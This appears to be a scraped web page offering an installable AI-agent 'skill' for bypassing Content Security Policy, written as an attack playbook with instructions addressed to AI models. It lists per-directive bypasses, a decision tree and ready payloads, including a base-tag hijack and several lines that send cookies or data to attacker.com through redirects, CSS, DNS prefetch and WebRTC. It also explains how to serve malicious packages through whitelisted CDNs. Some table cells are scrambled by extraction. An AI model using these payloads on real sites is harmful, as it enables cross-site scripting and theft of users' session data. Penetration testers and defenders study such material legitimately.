安装
npx skills add https://github.com/yaklang/hack-skills --skill csp-bypass-advanced
复制
SKILL: CSP Bypass — Advanced Techniques
AI LOAD INSTRUCTION
Covers per-directive bypass techniques, nonce/hash abuse, trusted CDN exploitation, data exfiltration despite CSP, and framework-specific bypasses. Base models often suggest
unsafe-inline
bypass without checking if the CSP actually uses it, or miss the critical
base-uri
and
object-src
gaps.
0. RELATED ROUTING
xss-cross-site-scripting
for XSS vectors to deliver after CSP bypass
dangling-markup-injection
when CSP blocks scripts but HTML injection exists — exfiltrate without JS
crlf-injection
when CRLF can inject CSP header or steal nonce via response splitting
waf-bypass-techniques
when both WAF and CSP must be bypassed
clickjacking
when CSP lacks
frame-ancestors
— clickjacking still possible
1. CSP DIRECTIVE REFERENCE MATRIX
Directive
Controls
Default Fallback
default-src
Fallback for all
-src
directives not explicitly set
None (browser default: allow all)
script-src
JavaScript execution
default-src
style-src
CSS loading
default-src
img-src
Image loading
default-src
connect-src
XHR, fetch, WebSocket, EventSource
default-src
frame-src
iframe/frame sources
default-src
font-src
Font loading
default-src
object-src
,
,
default-src
media-src
,
default-src
base-uri
<base>
element
No fallback
— unrestricted if absent
form-action
Form submission targets
No fallback
— unrestricted if absent
frame-ancestors
Who can embed this page (replaces X-Frame-Options)
No fallback
— unrestricted if absent
report-uri
/
report-to
Where violation reports are sent
N/A
navigate-to
Navigation targets (limited browser support)
No fallback
Critical insight
:
base-uri
,
form-action
, and
frame-ancestors
do NOT fall back to
default-src
. Their absence is always a potential bypass vector.
2. BYPASS TECHNIQUES BY DIRECTIVE
2.1
script-src 'self'
The app only allows scripts from its own origin. Bypass vectors:
Vector
Technique
JSONP endpoints
— JSONP reflects callback as JS
Uploaded JS files
Upload
.js
file (e.g., avatar upload accepts any extension) →
DOM XSS sinks
Find DOM sinks (innerHTML, eval, document.write) in existing same-origin JS — inject via URL fragment/param
Angular/Vue template injection
If framework is loaded from
'self'
, inject template expressions:
{{constructor.constructor('alert(1)')()}}
Service Worker
Register SW from same origin → intercept and modify responses
Path confusion
<script src="/user-content/;/legit.js">
— server returns user content due to path parsing, but URL matches
'self'
2.2
script-src
with CDN Whitelist
script-src 'self' *.googleapis.com *.gstatic.com cdn.jsdelivr.net
Whitelisted CDN
Bypass
cdnjs.cloudflare.com
Host arbitrary JS via CDNJS (find lib with callback/eval):
angular.js
→ template injection
cdn.jsdelivr.net
jsdelivr serves any npm package or GitHub file:
cdn.jsdelivr.net/npm/attacker-package@1.0.0/evil.js
*.googleapis.com
Google JSONP endpoints, Google Maps callback parameter
unpkg.com
Same as jsdelivr — serves arbitrary npm packages
*.cloudfront.net
CloudFront distributions are shared — any CF customer's JS is allowed
Trick
: Search for JSONP endpoints on whitelisted domains:
site:googleapis.com inurl:callback
2.3
script-src 'unsafe-eval'
eval()
,
Function()
,
setTimeout(string)
,
setInterval(string)
all permitted.
// Template injection → RCE-equivalent in browser
[
]
.
constructor
.
constructor
(
'alert(document.cookie)'
)
(
)
// JSON.parse doesn't execute code, but if result is used in eval context:
// App does: eval('var x = ' + JSON.parse(userInput))
2.4
script-src 'nonce-xxx'
Only scripts with matching nonce attribute execute.
Bypass
Condition
Nonce reuse
Server uses same nonce across requests or for all users → predictable
Nonce injection via CRLF
CRLF in response header → inject new CSP header with known nonce, or inject
<script nonce="known">
Dangling markup to steal nonce
<
embed
src
=
"
/user-upload/evil.pdf
"
type
=
"
application/pdf
"
2.8 Missing
base-uri
<
base
href
=
"
https://attacker.com/
"
This bypasses
'nonce-xxx'
,
'strict-dynamic'
, and
script-src 'self'
for relative script paths.
2.9 Missing
frame-ancestors
CSP without
frame-ancestors
→ page can be framed → clickjacking possible.
X-Frame-Options
header is overridden by
frame-ancestors
if CSP is present. But if CSP exists without
frame-ancestors
, some browsers ignore XFO entirely.
3. CSP IN META TAG vs. HEADER
<
meta
http-equiv
=
"
Content-Security-Policy
"
content
=
"
script-src 'self'
"
Meta tag limitations:
Cannot set
frame-ancestors
(ignored in meta)
Cannot set
report-uri
/
report-to
Cannot set
sandbox
If injected via HTML injection
before
the meta tag in DOM order, attacker's meta CSP may be processed first (browser uses first encountered)
If page has both header CSP and meta CSP,
both apply
(most restrictive wins)
4. DATA EXFILTRATION DESPITE CSP
When
connect-src
,
img-src
, etc. are locked down, alternative exfiltration channels:
Channel
CSP Directive Needed to Block
Technique
DNS prefetch
None (CSP cannot block DNS)
<link rel="dns-prefetch" href="//data.attacker.com">
WebRTC
None (CSP cannot block)
new RTCPeerConnection({iceServers:[{urls:'stun:attacker.com'}]})
<link rel=prefetch>
default-src
or
connect-src
Often missed in CSP
Redirect-based
navigate-to
(rarely set)
location='https://attacker.com/?'+document.cookie
CSS injection
style-src
<style>body{background:url(https://attacker.com/?data)}</style>
connect-src
click
report-uri
leak
N/A
Trigger CSP violation → report contains blocked-uri with data
Form submission
form-action
DNS-based exfiltration is nearly impossible to block with CSP
— this is the most reliable channel.
5. CSP BYPASS DECISION TREE
CSP present?
├── Read full policy (response headers + meta tags)
│
├── Check for obvious weaknesses
│ ├── 'unsafe-inline' in script-src? → Standard XSS works
│ ├── 'unsafe-eval' in script-src? → eval/Function/setTimeout bypass
│ ├── * or data: in script-src? → <script src="data:,alert(1)">
│ └── No CSP header at all on some pages? → Find CSP-free page
│
├── Check missing directives
│ ├── No base-uri? → <base href="https://attacker.com/"> → hijack relative scripts
│ ├── No object-src? → Flash/plugin-based bypass (legacy)
│ ├── No form-action? → Exfil via form submission
│ ├── No frame-ancestors? → Clickjacking possible
│ └── No connect-src falling back to lax default-src? → fetch/XHR exfil
│
├── script-src 'self'?
│ ├── Find JSONP endpoints on same origin
│ ├── Find file upload → upload .js file
│ ├── Find DOM XSS in existing same-origin scripts
│ └── Find Angular/Vue loaded from self → template injection
│
├── script-src with CDN whitelist?
│ ├── Check CDN for JSONP endpoints
│ ├── Check jsdelivr/unpkg/cdnjs → load attacker-controlled package
│ └── Check *.cloudfront.net → shared distribution namespace
│
├── script-src 'nonce-xxx'?
│ ├── Nonce reused across requests? → Replay
│ ├── CRLF injection available? → Inject nonce
│ ├── Dangling markup to steal nonce
│ └── Script gadget in trusted scripts
│
├── script-src 'strict-dynamic'?
│ ├── base-uri not set? → <base> hijack
│ ├── DOM XSS in trusted script? → Inherit trust
│ └── Script gadget creating dynamic scripts from DOM data
│
└── All script execution blocked?
├── Dangling markup injection → exfil without JS (see ../dangling-markup-injection/SKILL.md)
├── DNS prefetch exfiltration
├── WebRTC exfiltration
├── CSS injection for data extraction
└── Form action exfiltration
6. TRICK NOTES — WHAT AI MODELS MISS
default-src 'self'
does NOT restrict
base-uri
or
form-action
— these have no fallback. This is the #1 CSP mistake.
strict-dynamic
ignores whitelist
When
strict-dynamic
is present, host-based allowlists and
'self'
are ignored for script loading. Only nonce/hash and trust propagation matter.
Multiple CSPs stack
If both
Content-Security-Policy
header and
<meta>
CSP exist, the browser enforces BOTH — the effective policy is the intersection (most restrictive).
Content-Security-Policy-Report-Only
does not enforce — it only reports. Check for the correct header name.
Nonce length matters
Nonces should be ≥128 bits of entropy. Short or predictable nonces can be brute-forced or guessed.
Report-uri information disclosure
CSP violation reports sent to
report-uri
contain
blocked-uri
,
source-file
,
line-number
— this can leak internal URLs, script paths, and page structure to whoever controls the report endpoint.
data:
in script-src
:
script-src 'self' data:
allows
<script src="data:text/javascript,alert(1)">
— trivial bypass, but commonly seen in real-world CSPs.
← 返回排行榜